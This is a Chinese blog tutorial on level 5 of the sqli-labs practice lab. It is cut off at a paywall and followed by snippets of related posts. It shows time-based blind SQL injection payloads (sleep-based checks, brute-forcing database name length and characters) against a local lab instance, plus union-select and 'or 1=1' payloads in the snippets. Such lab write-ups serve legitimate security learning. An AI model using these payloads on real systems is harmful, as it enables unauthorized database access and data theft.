sqli-lab教程——Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

已于 2022-07-08 09:38:21 修改
阅读量327 收藏 1
点赞数
文章标签: 大数据 数据库 sql
于 2022-07-06 09:12:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luosaierdadi/article/details/125632301
版权
本文详细介绍了sqli-lab的Less-5级别,探讨了GET方式的双注入攻击,通过时间延迟型、布尔型和concat聚合函数三种方法进行数据库、表、列以及字段的爆破。通过实例展示了手工注入的步骤,并提醒开发者避免重复性工作,推荐使用sqlmap工具提高效率。
摘要由CSDN通过智能技术生成

如果看到这个报错信息,第一反应就是布尔型盲注、报错型注入、时间延迟型盲注了

下面给出验证时间延迟型的盲注:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+

发现明显延迟,说明猜测正确。接下来的思路是通过延迟,依次爆破数据库长度,数据库名,表名,列名,以及字段。

布尔型和时间延迟型盲注建议采用sqlmap去跑。

其实本题不能称作盲注,因为存在回显,真正的盲注时不存在回显的,只能根据浏览器加载页面情况,判定是否注入成功。

一些专业术语的误用请见谅。

方法一:时间延迟型手工注入:

时间延迟型手工注入,正确会延迟,错误没有延迟。id无所谓,又不看回显,可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。

时间延迟型和报错型payload核心部分的构造相同

本方法中payload  =  ?id=1' and if(报错型payload核心部分,sleep(5),1)--+

爆库长payload
?id=1' and if(length(database())=8,sleep(5),1)--+

明显延迟,数据库长度为8.

爆库名payload

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

明显延迟,数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(data

最低0.47元/天 解锁文章
luosaierdadi
关注
sqli-lab通关笔记
SYJ_361的博客
12-15 4348
sqli-lab通关笔记前6关 Less-1–基于单引号字符注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
sqli-lab教程——1-35通关
缘木之鱼
05-08 6607
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 503
本节练习涉及到了一个新的概念:注入注入简单理解为一个select查询里嵌套一个select查询,如果要利用注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
SQL注入攻击】GET-Double Injection-Single Quotes-String注入GET单引号字符注入
sm1918451478的博客
10-31 478
SQL注入攻击】GET-Double Injection-Single Quotes-String注入GET单引号字符注入
sqli_lab
ing_end的博客
03-05 3531
读写文件 此状态不允许导入导出状态 修改限制成功 – (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 显示位: 这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
luosaierdadi的博客
06-28 431
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始数据吧。注意 id=非正确值库payload?id=-1' union select 1,2,database() --+得到‘security’库表payload?id=-1' unio
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符注入)
luosaierdadi的博客
07-09 256
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sqli-lab教程——Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的引号POST字符变形的注入)
luosaierdadi的博客
07-09 749
引号报错注入按照题意应该是可以使用上一题的payload只需要修改单引号引号,但是实际测试不行,无论我使用--+还是%23还是#都不行,我就看了一下php文件:可以看到sql查询语句:@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";构造一个能闭合语句而且会报错的payload:admin" and extractvalue(1,concat(0
sqli-lab教程——Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
luosaierdadi的博客
07-08 568
不管怎么输入,回显总是you are ... 考虑时间盲注,payload ?id=1' and sleep(3) --+ 注意id=1,发现明显延迟,说明注入成功,接下来破就完了。这道题的payload构造和第五题的方法一是一样的,一些废话就不多说了,这里就列一下过程,完事儿。库payload?id=1' and if(length(database())=4 , sleep(3), 1) --+ 发现当?id=1' and if(length(database())=8 , sleep(3), 1
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 2654
获取数据库时可以使用 left() 函数,这里使用 substr() 函数截取数据库的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 9928
sql注入集合
sqli-labs练习(五)------GET-Double injection-Single Quotes-String
wkend的博客
04-17 915
按提示,输入id参数1,得到回馈结果,但是没用 输入1',报错 查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错, 通过以上过程可以发现,当我们改变参数的时候,回显只有两种结果 1&gt;You are in........... 2&gt; 报错信息 没办法,正确的查询只返回第一种情况,那么只能靠第二种回显结果了,...
Sqli-lab
Mccc_li的博客
04-09 419
1. less less1 输入 1 正常回显 输入1’ 报错 输入1’%23或者1’–+ 正常回显(可以判断出是字符的) 输入1’ and 1=1–+正常回显 输入1’ and 1=2–+不回显(可以判断存在注入点) 输入1’ order by 1/2/3/4 发现输入4的时候报错,字段为三 输入-1’ union select 1,2,database(),看数据库 输入:-1' ...
sqli-lab环境搭建
cangyu51462的博客
12-16 2775
安装sqli-lab
sqli-labs通关记录
qq_39670065的博客
07-11 2809
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命
SQLI-LABS(一)
weixin_51075988的博客
11-23 1362
SQLI-LABS (一) 学习前的准备: sql是什么? sql注入:在web应用程序事先定义好的查询语句结尾添加额外SQL语句, 欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息,进行提权等; 2、搭建sqli-labs(可以使用phpstudy搭建); 3、学会在 mysql命令行 中进行 mysql的基本用法 ; mysql命令行的具体打开方法:找到\phpstudy_pro\extensions\mysql5.7.26\bin ,在Windows命令中进入bin中,输入"mysql -u
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 474
这一关与上一关很相似,唯一的区别就在于是采用引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
Sqli-lab详解(持续更新ing)
最新发布
weixin_66022252的博客
09-02 897
根据学习进度会持续更新ing
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值